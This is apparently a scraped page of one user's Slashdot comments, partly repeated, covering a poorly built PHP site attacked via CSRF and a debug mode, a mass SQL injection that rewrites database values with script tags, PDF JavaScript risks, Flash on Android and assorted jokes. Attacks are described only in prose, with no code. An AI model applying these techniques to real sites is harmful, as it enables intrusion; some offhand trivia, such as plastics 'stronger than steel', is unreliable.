and lets you come up with your own designs. like the internet made everyone a publisher, this could make every one a manufacturer. write your own books and distribute online, design your own gun model and distribute online. watch out, the next **AA will be the NRAA.
this person owns their own business. he's not an advanced dev by any stretch of the imagination. he doesn't use version control, he's just starting to discover "frameworks" though i don't know if he really understands the concept yet. he taped together some php code that let him set a cookie marking himself as as admin, and a setting variable that allowed him to "debug" his code. this was essentially a form box at the bottom of the page that let him run arbitrary code at certain points -- all for the sake of not swapping back to his code editor, saving, swapping back to the browser, refreshing. the site that got attacked was so small i don't know how he was found. my guess is he posted for help on a bunch of forums and left links to his site. i thought it was funny that there was some pdo code in the site, because he'd outsourced to india for a couple months to handle his workload. i've known him for longer than i've known how to code and he has a pride issue with asking me for help in that area.
if you have a form input box that lets you update variable values with ajax like as if it were firebug, you can skip prepared statements. the overall point is that with enough ignorance and carelessness you can build an app that lets someone abuse every major vulnerability, while still thinking that you're secure, even using prepared statements for your own queries.
i'm not sure where everyone is getting xss from. i said cross-site request forgery, that's csrf. and yes, this person's app was (very poorly) written in php.
marijuana resin can be used to make plastics stronger than steel. henry ford made a car body out of it and demonstrated it with a sledgehammer: http://www.youtube.com/watch?v=xRIvGxCLHGI
prepared statements work great for almost every sql injection attack, but they are not the silver bullet. the structure of your app could allow an xss attack to run a query that doesn't use them, for instance.
i've also seen some really nasty sql injection attacks using declare, cast and exec to traverse every db, every row, every column and replace every value with an html script tag referencing a foreign-hosted javascript file -- all stemming from a cross-site request forgery that allowed the attacker to run the app as an admin in "debug" mode. almost everything that went wrong with that problem was caused by application architecture.
the reality is most devs don't get to learn about these things until it happens to them. roll that in your eula and smoke it.
pdfs are supposed to be rich formatted text documents that can embed images, nothing more. by allowing document creators to embed javascript, they open this medium up to many of the same, and some unique, attack vectors. here's just one example that made the news: http://www.zdnet.com/blog/security/adobe-confirms-pdf-zero-day-attacks-disable-javascript-now/5119. the same poisoned pdfs when rendered through a pdf reader without javascript execution capabilities are harmless. it doesn't really matter how the bad javascript code got there (just that it can be executed if it is there), but your info about livecycle-produced pdfs is interesting.
chris farley died of an overdose on a mixture of cocaine and heroin known as a speedball. coincidentally, john belushi, another overweight comedic actor, died the same way. it could be argued that depression led to the excessive use of these drugs, but the cause of death is officially drug overdose. not suicide.
patenting the buttprint authentication system for toilets. nobody but you will be allowed to use the commode.
version 2: hydrofluoric acid bidet security countermeasure and automatic facebook update (frees up your hands for, uhh, other activities...).
false buttprint matches will still be identified via facebook, so your countermeasure incident is posted automatically too. connects to facebook via google TiSP http://www.google.com/onceuponatime/tisp/
product slogan: protect your shit! crowdsource me plz, you can reach me at those.are.my.stains@buttprintz.com.
The easiest way to ensure ongoing access to Flash Player on Android 4.0 or earlier devices [http://www.adobe.com/go/certifieddevices] is to use certified devices and ensure that the Flash Player is either pre-installed by the manufacturer or installed from Google Play Store before August 15th. If a device is upgraded from Android 4.0 to Android 4.1, the current version of Flash Player may exhibit unpredictable behavior, as it is not certified for use with Android 4.1. Future updates to Flash Player will not work. We recommend uninstalling Flash Player on devices which have been upgraded to Android 4.1.
Slashdot Mirror
no way -- GET OF MY LAWN!! damn hippies. if your hippy girlfriend has free love, then i've got a free room. she has to use the bucket first tho
and lets you come up with your own designs. like the internet made everyone a publisher, this could make every one a manufacturer. write your own books and distribute online, design your own gun model and distribute online. watch out, the next **AA will be the NRAA.
this person owns their own business. he's not an advanced dev by any stretch of the imagination. he doesn't use version control, he's just starting to discover "frameworks" though i don't know if he really understands the concept yet. he taped together some php code that let him set a cookie marking himself as as admin, and a setting variable that allowed him to "debug" his code. this was essentially a form box at the bottom of the page that let him run arbitrary code at certain points -- all for the sake of not swapping back to his code editor, saving, swapping back to the browser, refreshing. the site that got attacked was so small i don't know how he was found. my guess is he posted for help on a bunch of forums and left links to his site. i thought it was funny that there was some pdo code in the site, because he'd outsourced to india for a couple months to handle his workload. i've known him for longer than i've known how to code and he has a pride issue with asking me for help in that area.
if you have a form input box that lets you update variable values with ajax like as if it were firebug, you can skip prepared statements. the overall point is that with enough ignorance and carelessness you can build an app that lets someone abuse every major vulnerability, while still thinking that you're secure, even using prepared statements for your own queries.
i'm not sure where everyone is getting xss from. i said cross-site request forgery, that's csrf. and yes, this person's app was (very poorly) written in php.
i referred to a csrf, not xss. although this poor dev's little hand drawn admin mode was also vulnerable to xss. it was a nightmare to look at.
i think it's jerk, jerk, jerk and maybe ...
both obama and romney gave that answer when asked "what the fuck are you doing here?"
marijuana resin can be used to make plastics stronger than steel. henry ford made a car body out of it and demonstrated it with a sledgehammer: http://www.youtube.com/watch?v=xRIvGxCLHGI
prepared statements work great for almost every sql injection attack, but they are not the silver bullet. the structure of your app could allow an xss attack to run a query that doesn't use them, for instance.
i've also seen some really nasty sql injection attacks using declare, cast and exec to traverse every db, every row, every column and replace every value with an html script tag referencing a foreign-hosted javascript file -- all stemming from a cross-site request forgery that allowed the attacker to run the app as an admin in "debug" mode. almost everything that went wrong with that problem was caused by application architecture.
the reality is most devs don't get to learn about these things until it happens to them. roll that in your eula and smoke it.
you mean PCI compliance. it's not a law, though some states have laws that borrow heavily from this standard.
http://www.pcicomplianceguide.org/security-tips-20090227-pci-compliance-law.php
Most people in the South?...
If so, that could still mean he's overweight.
FTFY
are you sure you're not confusing this story with this one? http://science.slashdot.org/story/12/08/15/0447228/widely-used-antibacterial-chemical-may-impair-muscle-function
AND, it's not called Vegas, it's LAS Vegas. take your medicine, mcgrew. take it. do it now.
what do you mean, you people?
pdfs are supposed to be rich formatted text documents that can embed images, nothing more. by allowing document creators to embed javascript, they open this medium up to many of the same, and some unique, attack vectors. here's just one example that made the news: http://www.zdnet.com/blog/security/adobe-confirms-pdf-zero-day-attacks-disable-javascript-now/5119. the same poisoned pdfs when rendered through a pdf reader without javascript execution capabilities are harmless. it doesn't really matter how the bad javascript code got there (just that it can be executed if it is there), but your info about livecycle-produced pdfs is interesting.
imho it got out of control when they added executable javascript.
good point. anyone with enough money to make this happen is going to give you the version of history that they wrote.
a little too excited to get this story out. as soon as "justin bieber" entered his mental typing buffer the whole machinery took a giant crap.
chris farley died of an overdose on a mixture of cocaine and heroin known as a speedball. coincidentally, john belushi, another overweight comedic actor, died the same way. it could be argued that depression led to the excessive use of these drugs, but the cause of death is officially drug overdose. not suicide.
really? the headline was enough clue for me to know the article is bullshit.
patenting the buttprint authentication system for toilets. nobody but you will be allowed to use the commode.
version 2: hydrofluoric acid bidet security countermeasure and automatic facebook update (frees up your hands for, uhh, other activities...).
false buttprint matches will still be identified via facebook, so your countermeasure incident is posted automatically too. connects to facebook via google TiSP http://www.google.com/onceuponatime/tisp/
product slogan: protect your shit! crowdsource me plz, you can reach me at those.are.my.stains@buttprintz.com.
OH SO SORRY! the url is in all lowercase. hope you don't get an aneurysm.
http://tech.slashdot.org/story/11/07/13/1527242/bill-gates-looks-to-reinvent-the-toilet
kill two birds and make it big enough to flush ballmer
The easiest way to ensure ongoing access to Flash Player on Android 4.0 or earlier devices [http://www.adobe.com/go/certifieddevices] is to use certified devices and ensure that the Flash Player is either pre-installed by the manufacturer or installed from Google Play Store before August 15th. If a device is upgraded from Android 4.0 to Android 4.1, the current version of Flash Player may exhibit unpredictable behavior, as it is not certified for use with Android 4.1. Future updates to Flash Player will not work. We recommend uninstalling Flash Player on devices which have been upgraded to Android 4.1.